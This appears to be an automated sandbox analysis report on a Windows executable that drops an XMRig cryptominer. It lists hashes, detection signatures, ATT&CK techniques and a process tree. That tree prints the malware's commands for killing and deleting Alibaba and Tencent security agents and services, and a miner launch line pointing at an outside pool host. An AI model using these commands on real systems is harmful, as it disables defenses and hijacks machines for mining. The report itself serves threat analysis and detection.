Analysis

  • max time kernel
    23s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    04-05-2021 15:01

General

  • Target

    70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe

  • Size

    569KB

  • MD5

    c85e27470e88ad0d0449ab68ef18d0a3

  • SHA1

    4791330c3acf353772c3d073cc52a619eb4cd7cc

  • SHA256

    70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f

  • SHA512

    39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Stops running service(s) 3 TTPs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Kills process with taskkill 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
    "C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\htttp.exe
      "C:\Windows\htttp.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1972
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\run.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1096
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /FI " IMAGENAME eq Ali_update.exe"
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1036
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /FI " IMAGENAME eq aliyun_assist_service.exe"
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:652
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /FI " IMAGENAME eq aliyun_assist_update.exe"
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1832
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /FI " IMAGENAME eq aliyun_installer.exe"
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1488
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM aliyun_assist_service.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1980
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM aliyun_assist_update.exe"
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1580
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM aliyun_installer.exe"
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1996
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM Ali_update.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:568
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM AliHids.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1452
        • C:\Windows\SysWOW64\sc.exe
          sc stop "Alibaba Security Aegis Detect Service"
          4⤵
            PID:1376
          • C:\Windows\SysWOW64\sc.exe
            sc stop "Alibaba Security Aegis Update Service"
            4⤵
              PID:1868
            • C:\Windows\SysWOW64\sc.exe
              sc delete "Alibaba Security Aegis Detect Service"
              4⤵
                PID:1968
              • C:\Windows\SysWOW64\sc.exe
                sc delete "Alibaba Security Aegis Update Service"
                4⤵
                  PID:1964
                • C:\Windows\SysWOW64\sc.exe
                  sc stop "BaradAgentSvc"
                  4⤵
                    PID:1720
                  • C:\Windows\SysWOW64\sc.exe
                    sc stop "StargateSvc"
                    4⤵
                      PID:1816
                    • C:\Windows\SysWOW64\sc.exe
                      sc stop "QPCore"
                      4⤵
                        PID:1340
                      • C:\Windows\SysWOW64\sc.exe
                        sc delete "BaradAgentSvc"
                        4⤵
                          PID:1988
                        • C:\Windows\SysWOW64\sc.exe
                          sc delete "StargateSvc"
                          4⤵
                            PID:1036
                          • C:\Windows\SysWOW64\sc.exe
                            sc delete "QPCore"
                            4⤵
                              PID:1388
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM QQProtect.exe
                              4⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1676
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM sgagent.exe
                              4⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1600
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM BaradAgent.exe
                              4⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:960
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM YDLive.exe
                              4⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:568
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM YDService.exe
                              4⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1328
                          • C:\Users\Admin\AppData\Local\Temp\redis-server.exe
                            "C:\Users\Admin\AppData\Local\Temp\redis-server.exe" -o pool.fuck-jp.ru:8888 --nicehash true
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1604

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Persistence

                      Modify Existing Service

                      1
                      T1031

                      Registry Run Keys / Startup Folder

                      1
                      T1060

                      Defense Evasion

                      Impair Defenses

                      1
                      T1562

                      Modify Registry

                      1
                      T1112

                      Discovery

                      System Information Discovery

                      1
                      T1082

                      Process Discovery

                      1
                      T1057

                      Impact

                      Service Stop

                      1
                      T1489

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\redis-server.exe
                        MD5

                        0c4ae60bb07bd7c084ca66b844fa0b4b

                        SHA1

                        ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80

                        SHA256

                        31cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e

                        SHA512

                        5dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d

                      • C:\Users\Admin\AppData\Local\Temp\redis-server.exe
                        MD5

                        0c4ae60bb07bd7c084ca66b844fa0b4b

                        SHA1

                        ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80

                        SHA256

                        31cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e

                        SHA512

                        5dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d

                      • C:\Users\Admin\AppData\Local\Temp\run.bat
                        MD5

                        f1cc668d01eeb779b1fc1044541fc1d4

                        SHA1

                        45bd782881b31eb2868fc211b19af2cb627a9d0d

                        SHA256

                        62fdc9b8581a931ac987446ab4c8547bb9f94d9caf8e61c3d0d95ec033e73929

                        SHA512

                        293263607a850f2bb6873924b6606b83c7ea0dbd9fa07c0d8958be9e64aa1b27e24a0cf213b89906b3919c32da3c265d3ae9df07430ab4441b7289b3e935c33e

                      • C:\Windows\htttp.exe
                        MD5

                        c85e27470e88ad0d0449ab68ef18d0a3

                        SHA1

                        4791330c3acf353772c3d073cc52a619eb4cd7cc

                        SHA256

                        70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f

                        SHA512

                        39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01

                      • C:\Windows\htttp.exe
                        MD5

                        c85e27470e88ad0d0449ab68ef18d0a3

                        SHA1

                        4791330c3acf353772c3d073cc52a619eb4cd7cc

                        SHA256

                        70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f

                        SHA512

                        39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01

                      • \Users\Admin\AppData\Local\Temp\redis-server.exe
                        MD5

                        0c4ae60bb07bd7c084ca66b844fa0b4b

                        SHA1

                        ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80

                        SHA256

                        31cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e

                        SHA512

                        5dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d

                      • \Users\Admin\AppData\Local\Temp\redis-server.exe
                        MD5

                        0c4ae60bb07bd7c084ca66b844fa0b4b

                        SHA1

                        ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80

                        SHA256

                        31cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e

                        SHA512

                        5dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d

                      • memory/568-96-0x0000000000000000-mapping.dmp
                      • memory/568-74-0x0000000000000000-mapping.dmp
                      • memory/652-67-0x0000000000000000-mapping.dmp
                      • memory/960-95-0x0000000000000000-mapping.dmp
                      • memory/1036-89-0x0000000000000000-mapping.dmp
                      • memory/1036-66-0x0000000000000000-mapping.dmp
                      • memory/1096-64-0x0000000000000000-mapping.dmp
                      • memory/1328-97-0x0000000000000000-mapping.dmp
                      • memory/1340-82-0x0000000000000000-mapping.dmp
                      • memory/1376-76-0x0000000000000000-mapping.dmp
                      • memory/1388-90-0x0000000000000000-mapping.dmp
                      • memory/1452-75-0x0000000000000000-mapping.dmp
                      • memory/1488-70-0x0000000000000000-mapping.dmp
                      • memory/1580-72-0x0000000000000000-mapping.dmp
                      • memory/1600-94-0x0000000000000000-mapping.dmp
                      • memory/1604-93-0x00000000001F0000-0x0000000000210000-memory.dmp
                        Filesize

                        128KB

                      • memory/1604-92-0x000000013F870000-0x00000001407DA000-memory.dmp
                        Filesize

                        15.4MB

                      • memory/1604-98-0x0000000000550000-0x0000000000570000-memory.dmp
                        Filesize

                        128KB

                      • memory/1604-99-0x0000000000570000-0x0000000000590000-memory.dmp
                        Filesize

                        128KB

                      • memory/1604-84-0x0000000000000000-mapping.dmp
                      • memory/1676-91-0x0000000000000000-mapping.dmp
                      • memory/1688-60-0x0000000075011000-0x0000000075013000-memory.dmp
                        Filesize

                        8KB

                      • memory/1720-80-0x0000000000000000-mapping.dmp
                      • memory/1816-81-0x0000000000000000-mapping.dmp
                      • memory/1832-69-0x0000000000000000-mapping.dmp
                      • memory/1868-77-0x0000000000000000-mapping.dmp
                      • memory/1964-79-0x0000000000000000-mapping.dmp
                      • memory/1968-78-0x0000000000000000-mapping.dmp
                      • memory/1972-61-0x0000000000000000-mapping.dmp
                      • memory/1980-71-0x0000000000000000-mapping.dmp
                      • memory/1988-86-0x0000000000000000-mapping.dmp
                      • memory/1996-73-0x0000000000000000-mapping.dmp